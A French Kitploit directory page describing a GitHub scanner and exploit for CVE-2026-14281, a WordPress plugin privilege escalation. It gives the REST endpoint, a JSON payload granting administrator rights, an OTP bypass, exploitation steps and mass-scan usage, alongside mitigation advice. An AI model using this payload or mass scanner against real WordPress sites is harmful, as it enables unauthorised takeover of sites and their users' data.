Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-14281 — Scanner de masse et exploit ciblé unique pour CVE-2026-14281, une élévation de privilèges non authentifiée dans le plugin WordPress Automation Web Platform via l'inscription REST. | Kitploit
Outils/GitHubGitHub/langz337/cve-2026-14281
Escalade de PrivilègesReconnaissanceScanners de VulnérabilitésAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHublangz337/cve-2026-14281

CVE-2026-14281

11il y a 7 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Scanner de masse et exploit ciblé unique pour CVE-2026-14281, une élévation de privilèges non authentifiée dans le plugin WordPress Automation Web Platform via l'inscription REST.

Voir le dépôt

LANGZ Scanner + Exploit

Scanner de masse + Exploit ciblé unique pour CVE-2026-14281 — une escalade de privilèges non authentifiée dans le plugin WordPress Automation Web Platform (WAWP) <= 4.8.6.


Qu'est-ce que CVE-2026-14281 ?

Gestion inappropriée des privilèges (CWE-269) dans le plugin WordPress Automation Web Platform (par 101gen). Les versions <= 4.8.6 sont affectées.

ChampValeur
CVECVE-2026-14281
TypeEscalade de privilèges non authentifiée
CVSS9.8 (CRITIQUE)
AuthAucune requise
AffectéPlugin WAWP <= 4.8.6

Cause racine

Le plugin expose une route REST publique :

POST /wp-json/wawp/v1/signup/<op>

Aucune vérification de permission. Le gestionnaire copie les wawp_custom_fields contrôlés par l'attaquant dans update_user_meta() — sans liste blanche. L'attaquant définit :

{
  "wawp_custom_fields": {
    "wp_capabilities": {"administrator": true},
    "wp_user_level": "10"
  }
}

Résultat : le nouveau compte obtient le rôle administrator.

Bonus : contournement de l'OTP

Le jeton OTP (otp_transient) est renvoyé en clair dans le corps de la réponse. Une requête GET avec ce jeton le marque comme vérifié — aucun e-mail/SMS nécessaire.


Impact

  • Accès admin complet à WordPress
  • Installer / supprimer des plugins et thèmes
  • Gérer les utilisateurs, modifier le contenu
  • RCE potentiel via les éditeurs admin

Flux d'exploitation

  1. POST du payload vers /wp-json/wawp/v1/signup/ avec wp_capabilities: administrator
  2. Contourner l'OTP en utilisant le jeton en clair de la réponse
  3. Se connecter à /wp-login.php avec les nouveaux identifiants
  4. Confirmer en accédant à /wp-admin/users.php

Prérequis

  • Python 3.7+
  • requests, urllib3

Installation

git clone https://github.com/yourname/langz-scanner.git
cd langz-scanner
pip install requests urllib3

Utilisation

python3 CVE-2026-14281.py
[1] Mass Scan        -> detect many targets, save vuln to txt
[2] Verify Single    -> exploit + confirm + auto cleanup
[0] Exit

Mass Scan : fichier de liste de cibles en entrée, fichier de sortie (par défaut vuln.txt), nombre de threads (par défaut 20).

Verify Single : tapez YA, entrez l'URL cible. L'outil crée un admin temporaire, vérifie, puis nettoie.


Sortie

vuln.txt contient uniquement les URLs vulnérables confirmées, une par ligne :

http://target1.com
https://target2.org

Atténuation

  1. Mettre à jour le plugin au-delà de 4.8.6
  2. Si aucun correctif : désactiver le plugin ou bloquer /wp-json/wawp/v1/signup/
  3. Auditer les comptes admin frauduleux
  4. Renouveler les identifiants si compromis

Avertissement

For AUTHORIZED SECURITY TESTING only.
Do not use against systems you don't own or have permission to test.
The developer assumes no responsibility for misuse.

Use it wisely. Knowledge is meant to protect, not to destroy.

CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2026-14281

Télécharger l’outil